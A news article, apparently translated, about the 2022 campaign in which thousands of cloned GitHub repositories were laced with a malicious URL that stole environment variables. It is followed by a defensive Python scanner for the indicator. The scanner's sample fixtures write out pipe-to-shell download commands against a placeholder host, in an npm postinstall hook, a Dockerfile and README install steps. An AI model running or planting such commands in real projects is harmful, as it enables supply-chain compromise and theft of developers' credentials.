When we talk about GitHub, we are referring to one of the most widely used development platforms, one that stores the application code of a huge number of developers from all over the globe. It gives content creators and programmers a simple way to share their projects with others, although it is not free from malware attacks.
However, over the years we have seen, and on several occasions been affected by, various malware attacks against this online service. That is precisely the case that concerns us now: a massive attack that has just been discovered and that we describe next. To give a rough idea of its scale, thousands of GitHub repositories were found to have been cloned. Worse still, these clones were modified to include malware in order to trick other users.
Regular users of the platform will already know that cloning open source repositories is a fairly common practice. In this case, however, the plagiarists created copies of legitimate projects and contaminated them with malicious code. The aim is to make applications and pieces of code, contaminated versions of other legitimate ones, available to everyone.
All of this was discovered by software developer Stephen Lacy, who has called it a widespread malware attack on GitHub. Specifically, the attack is estimated to have affected some 35,000 software repositories hosted on the development platform. As noted above, these thousands of affected projects are copies or clones of other, legitimate ones.
Tens of thousands of malware-laced apps on GitHub
They were created by attackers to introduce malware. It is worth noting at this point that the original projects did not suffer any damage, so popular official projects such as crypto, golang, python or js have, in principle, not been affected. That does not make the finding any less important: as mentioned, the clones were created in order to introduce malicious code into these copies.
I am uncovering what seems to be a massive widespread malware attack on @github.
– Currently over 35k repositories are infected
– So far found in projects including: crypto, golang, python, js, bash, docker, k8s
– It is added to npm scripts, docker images and install docs pic.twitter.com/rq3CBDw3r9
— Stephen Lacy (@stephenlacy) August 3, 2022
The engineer who uncovered the whole scheme did so from a strange URL found in a piece of source code. Studying the case in more depth, he found that the use of this URL extended to more than 35,000 projects. Strictly, that figure is the number of files found to contain the malicious internet address, that is, the number of suspicious files, not of infected repositories.
In addition, it was discovered that more than 13,000 of the malicious results came from a single repository called redhat-operator-ecosystem. Even so, at the time of writing that repository has been removed from the GitHub platform, so it can be said that, little by little, these pieces of malware are disappearing and things are returning to normal.
It must also be borne in mind that the cloned projects containing the malicious URL did not merely capture the user's environment variables; they also carried a backdoor for code execution. Those variables can give attackers the passwords, API tokens or Amazon AWS credentials of those affected.
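As an added illustration (not code from the article or from Lacy's analysis), here is the kind of triage scan a defender would run over a directory of cloned repositories: it looks in the places the tweet names (npm scripts, Dockerfiles, install docs) for an indicator URL, reports matching files and distinct repositories separately, which is the caveat behind the 35,000 figure, and flags npm lifecycle hooks that reference it. The indicator URL and the sample repositories are constructed, since the article does not reproduce the real URL.

```python
import json
import os
import tempfile
from collections import defaultdict
from pathlib import Path

# The article does not reproduce the malicious URL, so this indicator is a constructed placeholder.
IOC_URL = "http://malicious.example.invalid/collect"
SCAN_NAMES = {"package.json", "Dockerfile"}  # npm scripts and Docker images, as named in the tweet
SCAN_EXTS = {".md", ".sh"}                    # install docs and helper scripts
NPM_HOOKS = ("preinstall", "install", "postinstall", "prepare")  # run automatically on npm install

def scan_repos(root, ioc=IOC_URL):
    """Walk root (one sub-directory per clone); return {repo: [relative paths that contain ioc]}."""
    hits = defaultdict(list)
    for dirpath, _, files in os.walk(root):
        for name in files:
            if name not in SCAN_NAMES and os.path.splitext(name)[1] not in SCAN_EXTS:
                continue
            path = Path(dirpath, name)
            if ioc in path.read_text(encoding="utf-8", errors="ignore"):
                rel = os.path.relpath(path, root)
                hits[rel.split(os.sep)[0]].append(rel)
    return dict(hits)

def summarize(hits):
    """Count matching files and distinct repositories separately, the caveat behind the 35,000 figure."""
    return {"files": sum(len(v) for v in hits.values()), "repositories": len(hits)}

def npm_hooks_with_ioc(root, repo, ioc=IOC_URL):
    """Return the lifecycle hooks in repo/package.json whose command references the indicator."""
    scripts = json.loads(Path(root, repo, "package.json").read_text(encoding="utf-8")).get("scripts", {})
    return [hook for hook in NPM_HOOKS if ioc in scripts.get(hook, "")]

def build_sample_tree():
    """Constructed sample: two tainted clones and one clean repository in a temporary directory."""
    root = tempfile.mkdtemp()
    files = {
        "clone-a/package.json": json.dumps({"scripts": {"postinstall": f"curl -s {IOC_URL} | sh", "test": "jest"}}),
        "clone-a/Dockerfile": f"FROM alpine\nRUN wget -qO- {IOC_URL} | sh\n",
        "clone-a/README.md": f"## Install\n\n    curl {IOC_URL} | bash\n",
        "clone-b/README.md": f"Before building, run: curl {IOC_URL} | sh\n",
        "clean/package.json": json.dumps({"scripts": {"postinstall": "node setup.js"}}),
    }
    for rel, content in files.items():
        path = Path(root, rel)
        path.parent.mkdir(parents=True, exist_ok=True)
        path.write_text(content, encoding="utf-8")
    return root
```

Running `summarize(scan_repos(build_sample_tree()))` on the constructed tree reports 4 files across 2 repositories, showing why a file count and a repository count must not be read as the same number.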